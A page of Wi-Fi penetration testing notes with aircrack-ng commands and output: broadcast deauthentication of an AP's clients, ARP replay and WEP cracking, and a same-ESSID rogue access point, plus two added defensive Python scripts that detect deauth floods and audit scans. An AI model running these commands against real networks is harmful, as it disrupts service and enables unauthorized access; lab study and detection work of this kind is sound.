Wi-Fi Penetration Testing Commands
$ cat monitor_mode.py
import os

# Put the wireless interface into monitor mode (creates wlp9s0mon)
os.system("sudo airmon-ng start wlp9s0")
$ sudo python3 monitor_mode.py
Found 4 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode
PID Name
1127 avahi-daemon
1136 NetworkManager
1170 wpa_supplicant
1174 avahi-daemon
PHY Interface Driver Chipset
phy0 wlp9s0 iwlwifi Intel Corporation Wi-Fi 6 AX200 (rev 1a)
(mac80211 monitor mode vif enabled for [phy0]wlp9s0 on [phy0]wlp9s0mon)
(mac80211 station mode vif disabled for [phy0]wlp9s0)
$ iwconfig
lo no wireless extensions.
enp0s31f6 no wireless extensions.
wlp9s0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power=-2147483648 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
###################################################################################
$ sudo aireplay-ng --test wlan0mon
###################################################################################
19:00:49 Trying broadcast probe requests...
19:00:49 Injection is working!
19:00:51 Found 3 APs
19:00:51 Trying directed probe requests...
19:00:51 18:A6:F7:FE:09:A2 - channel: 13 - '1 I am Iron Man'
19:00:57 0/30: 0%
19:00:57 34:98:B5:07:25:00 - channel: 13 - 'NETGEAR07250D'
19:01:03 0/30: 0%
19:01:03 44:A5:6E:CB:58:C1 - channel: 11 - 'bridge_vlan-10'
19:01:09 0/30: 0%
############################################################################
MAC Address of the Cheap TP Link AP
############################################################################
18:a6:f7:fe:09:a2
Command to find out which channel an AP with below BSSID is running on:
###################################################################################
sudo airodump-ng --bssid 18:a6:f7:fe:09:a2 wlp9s0mon
CH 7 ][ Elapsed: 1 min ][ 2022-09-09 19:06
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
18:A6:F7:FE:09:A2 -46 88 0 0 13 65 OPN 1 I am Iron Man <=== It's running on channel 13 and SSID is as displayed.
BSSID STATION PWR Rate Lost Frames Notes Probes
Packet injection
###################################################################################
Wireshark display filter for beacon frames (subtype 0x08) from this BSSID:
(wlan.bssid==18:a6:f7:fe:09:a2) && (wlan.fc.type_subtype==0x08)
###############################################################################
This command will inject packets in the air directed towards the above mentioned TP link AP.
###############################################################################
$ sudo aireplay-ng -9 -e "1 I am Iron Man" -a 18:a6:f7:fe:09:a2 wlp9s0mon -D -x 12
19:29:02 Trying broadcast probe requests...
19:29:02 Injection is working!
19:29:04 Found 1 AP
19:29:04 Trying directed probe requests...
19:29:04 18:A6:F7:FE:09:A2 - channel: 0 - '1 I am Iron Man'
19:29:10 0/30: 0%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Note: -D option ensures that even if AP is not on, the packet injector would still push the packets to the air with the
dest mac as the BSSID of that AP.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Sending De-auth to All the Connected Clients of an AP using packet injection via aireplay-ng tool
########################################################################################################
sudo aireplay-ng -0 5 -a 18:a6:f7:fe:09:a2 --ignore-negative wlp9s0mon
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ When the above command is issued, Deauth frame is sent to all the Stations of the
@ AP.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
16:38:01 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:02 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:02 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:03 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:03 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:04 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:04 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:05 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:05 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:05 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:06 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:06 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:07 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:07 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:08 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:08 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
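Seen from the monitoring side, the burst logged above is a run of broadcast deauthentication frames (management subtype 0x0c) naming one BSSID. The following is an added detection example, not part of the original notes: it parses bare 802.11 deauth frames and flags a BSSID when broadcast deauths exceed a threshold within a sliding window. The threshold, window, function names and sample frames are assumptions constructed for illustration.

```python
import struct
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"
FC_DEAUTH = 0xC0  # frame-control byte 0: version 0, type 0 (management), subtype 12

def _mac(raw):
    return ":".join(f"{b:02x}" for b in raw)

def parse_deauth(frame):
    """Return (dst, bssid, reason) for a bare 802.11 deauth frame, else None.
    Assumes the radiotap header has already been stripped."""
    if len(frame) < 26 or frame[0] != FC_DEAUTH:
        return None
    (reason,) = struct.unpack_from("<H", frame, 24)  # reason code follows the 24-byte header
    return _mac(frame[4:10]), _mac(frame[16:22]), reason

def detect_floods(events, threshold=10, window=5.0):
    """events: time-ordered (seconds, frame_bytes). Returns {bssid: peak count}
    of broadcast deauths inside any `window`-second span, for peaks >= threshold."""
    recent, alerts = defaultdict(deque), {}
    for ts, frame in events:
        parsed = parse_deauth(frame)
        if parsed is None or parsed[0] != BROADCAST:
            continue  # beacons, data and directed deauths are not counted
        bssid = parsed[1]
        q = recent[bssid]
        q.append(ts)
        while ts - q[0] > window:  # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            alerts[bssid] = max(alerts.get(bssid, 0), len(q))
    return alerts

def _sample_frame(fc, dst, bssid, reason):
    """Constructed test input: 24-byte management header + 2-byte reason code."""
    raw = lambda m: bytes.fromhex(m.replace(":", ""))
    return (bytes([fc, 0]) + b"\x00\x00" + raw(dst) + raw(bssid) + raw(bssid)
            + b"\x00\x00" + struct.pack("<H", reason))

AP = "18:a6:f7:fe:09:a2"
# Constructed capture mirroring the log above (16:38:01 .. 16:38:08, reason code 7).
SAMPLE = [(t, _sample_frame(0xC0, BROADCAST, AP, 7))
          for t in (1, 2, 2, 3, 3, 4, 4, 5, 5, 5, 6, 6, 7, 7, 8, 8)]
SAMPLE.append((9, _sample_frame(0x80, BROADCAST, AP, 0)))  # beacon-type frame: ignored
SAMPLE.append((9, _sample_frame(0xC0, "04:f1:28:3e:80:e7", "34:98:b5:07:25:00", 3)))  # single directed deauth

if __name__ == "__main__":
    print(detect_floods(SAMPLE))
```

Where both the AP and its clients use Protected Management Frames (802.11w), receivers discard unauthenticated deauth frames like these, so this kind of alert matters most on networks without PMF.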
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Command to view the list of clients connected to an AP:
The airodump-ng tool builds the list of clients connected to the AP by reading the
MAC addresses from the QoS Data packets.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
airodump-ng -c 13 -a --bssid 18:a6:f7:fe:09:a2 wlp9s0mon
#######################################################################################
WEP: Bypass shared key authentication
#######################################################################################
1. Use this command to check which channel the AP is currently on:
sudo airodump-ng wlp9s0mon
Output:
########################################################################################################################
CH 2 ][ Elapsed: 6 s ][ 2022-09-20 12:04
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
80:CC:9C:8D:D8:7F -36 2 0 0 10 360 WPA2 CCMP PSK <length: 0>
34:98:B5:07:25:00 -27 12 0 0 13 270 WPA2 CCMP PSK NETGEAR07250D
1A:0C:6B:5C:C9:F7 -29 3 0 0 8 360 WPA2 CCMP PSK NETGEAR-Guest-endurance
16:0C:6B:5C:C9:F7 -30 7 2 0 8 360 WPA2 CCMP PSK ORBI86-endurance
18:A6:F7:FE:09:A2 -31 9 0 0 13 54e. WEP WEP 1 I am Tony Stark <==================== The AP is in channel 13.
46:37:86:F3:72:C9 -32 2 0 0 8 360 WPA2 CCMP PSK NETGEAR-Guest-endurance
3C:37:86:F3:72:C9 -32 6 0 0 8 360 WPA2 CCMP PSK <length: 0>
42:37:86:F3:72:C9 -32 4 0 0 8 360 WPA2 CCMP PSK ORBI86-endurance
C8:9E:43:1A:EB:29 -33 2 0 0 6 360 WPA3 CCMP OWE <length: 0>
C8:9E:43:1A:EB:21 -40 2 0 0 6 360 WPA2 CCMP PSK ecizo-1
C8:9E:43:1A:EB:23 -37 2 0 0 6 360 WPA2 CCMP PSK ecizo-vlan3333
C8:9E:43:1A:EB:22 -35 2 0 0 6 360 OPN ecizo-vlan999
2. Now list the clients connected to the above AP.
sudo airodump-ng --bssid 18:A6:F7:FE:09:A2 --channel 13 --write "1 I am Tony Stark" wlp9s0mon
Output:
############################################################################################################################
CH 13 ][ Elapsed: 30 s ][ 2022-09-20 12:07
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER
18:A6:F7:FE:09:A2 -31 100 329 85 0 13 54e. WEP WEP
BSSID STATION PWR Rate Lost Frames Note
18:A6:F7:FE:09:A2 04:F1:28:3E:80:E7 -33 54e- 1e 399 75 <===== This is the MAC address of the STA connected to the AP.
3. The fundamental basis of cracking WEP is that we need many data packets encrypted with the same key
in order to exploit the weakness in the WEP protocol. This can be done by sending repeated ARP packets to this AP.
Since an ARP packet has a fixed protocol header, we can use the aireplay-ng tool to replay the ARP packets sent
from the connected STA to the AP.
Command for ARP Spoofing:
###############################################################################################################
sudo aireplay-ng -3 -b 18:A6:F7:FE:09:A2 -h 04:F1:28:3E:80:E7 wlp9s0mon
Output:
Read 66766 packets (got 2677 ARP requests and 35030 ACKs), sent 15987 pack
Read 66826 packets (got 2682 ARP requests and 35033 ACKs), sent 16037 pack
Read 66868 packets (got 2686 ARP requests and 35040 ACKs), sent 16086 pack
Read 66925 packets (got 2691 ARP requests and 35046 ACKs), sent 16136 pack
Read 66971 packets (got 2696 ARP requests and 35049 ACKs), sent 16187 pack
Read 67081 packets (got 2700 ARP requests and 35062 ACKs), sent 16236 pack^Cs...(499 pps)
Note: If the ARP packet count is not incrementing, inject a deauth packet for that STA towards the AP. The STA will disconnect, and on re-connection
it will trigger ARP, which the already-running aireplay-ng tool will then spoof. INTERESTING STUFF !!!!
4. Now, start the WEP cracking:
#################################################################################################
aircrack-ng replay_arp-0920-142804.cap
Output:
##################################################################################################
Reading packets, please wait...
Opening replay_arp-0920-142804.cap
Read 8 packets.
# BSSID ESSID Encryption
1 18:A6:F7:FE:09:A2 WEP (0 IVs)
Choosing first network as target.
Reading packets, please wait...
Opening replay_arp-0920-142804.cap
Read 8 packets.
1 potential targets
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 8 ivs.
Aircrack-ng 1.6
[00:00:04] Tested 164353 keys (got 8 IVs)
KB depth byte(vote)
0 255/256 FF( 0) 00( 0) 01( 0) 02( 0)
1 7/ 14 E4( 256) 00( 0) 01( 0) 02( 0)
2 7/ 2 EE( 256) 00( 0) 01( 0) 02( 0)
3 7/ 3 F2( 256) 00( 0) 01( 0) 02( 0)
4 0/ 1 49( 512) 44( 256) 68( 256) A5( 256)
Failed. Next try with 5000 IVs.
##########################################################################################
Command to create a Rogue Access Point with the same ESSID and a different BSSID and MAC address
##########################################################################################
sudo airbase-ng --essid "1 I am Iron Man" --channel 13 wlp9s0mon
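A site survey can catch both conditions shown in these notes: the WEP and open networks in the airodump-ng scan from step 1, and a second BSSID advertising an ESSID you own. The following is an added audit example, not part of the original notes; the inventory of authorised BSSIDs, the function names, the recognised cipher/auth tokens and the last scan row are assumptions constructed for illustration.

```python
import re

# Flattened airodump-ng AP rows: BSSID PWR Beacons #Data #/s CH MB ENC [CIPHER [AUTH]] ESSID
ROW = re.compile(
    r"^((?:[0-9A-F]{2}:){5}[0-9A-F]{2})\s+-?\d+\s+\d+\s+\d+\s+\d+\s+(\d+)\s+\S+\s+"
    r"(OPN|WEP|WPA3|WPA2|WPA)\b\s*(.*)$"
)
# Tokens this example recognises (those on the page plus common ones).
CIPHERS = {"CCMP", "TKIP", "WEP", "WEP40", "WEP104"}
AUTHS = {"PSK", "MGT", "SKA", "OPN", "OWE", "SAE"}

def parse_row(line):
    """Parse one AP row; returns None for headers and station rows."""
    m = ROW.match(line.strip())
    if not m:
        return None
    bssid, ch, enc, rest = m.groups()
    tokens, cipher, auth = rest.split(), "", ""
    if enc != "OPN":  # open networks print no CIPHER/AUTH columns
        if tokens and tokens[0] in CIPHERS:
            cipher = tokens.pop(0)
        if tokens and tokens[0] in AUTHS:  # AUTH can be blank, as in the WEP row
            auth = tokens.pop(0)
    return {"bssid": bssid, "channel": int(ch), "enc": enc,
            "cipher": cipher, "auth": auth, "essid": " ".join(tokens)}

def audit(lines, inventory):
    """inventory maps ESSID -> set of authorised BSSIDs (assumed to be kept by the site)."""
    findings = []
    for ap in filter(None, map(parse_row, lines)):
        if ap["enc"] in ("OPN", "WEP"):
            findings.append((ap["bssid"], ap["essid"], "weak-encryption:" + ap["enc"]))
        allowed = inventory.get(ap["essid"])
        if allowed is not None and ap["bssid"] not in allowed:
            findings.append((ap["bssid"], ap["essid"], "unlisted-bssid"))
    return findings

SCAN = [
    "BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID",
    "34:98:B5:07:25:00 -27 12 0 0 13 270 WPA2 CCMP PSK NETGEAR07250D",
    "16:0C:6B:5C:C9:F7 -30 7 2 0 8 360 WPA2 CCMP PSK ORBI86-endurance",
    "18:A6:F7:FE:09:A2 -31 9 0 0 13 54e. WEP WEP 1 I am Tony Stark",
    "42:37:86:F3:72:C9 -32 4 0 0 8 360 WPA2 CCMP PSK ORBI86-endurance",
    "C8:9E:43:1A:EB:29 -33 2 0 0 6 360 WPA3 CCMP OWE <length: 0>",
    "C8:9E:43:1A:EB:22 -35 2 0 0 6 360 OPN ecizo-vlan999",
    "02:00:00:00:00:01 -40 5 0 0 13 54 OPN 1 I am Tony Stark",  # constructed row, not from the scan
]
INVENTORY = {  # assumed site inventory
    "1 I am Tony Stark": {"18:A6:F7:FE:09:A2"},
    "ORBI86-endurance": {"16:0C:6B:5C:C9:F7", "42:37:86:F3:72:C9"},
}

if __name__ == "__main__":
    for finding in audit(SCAN, INVENTORY):
        print(finding)
```

An ESSID served by several BSSIDs is normal for mesh or multi-AP deployments, which is why the check compares against an inventory rather than flagging every duplicate name.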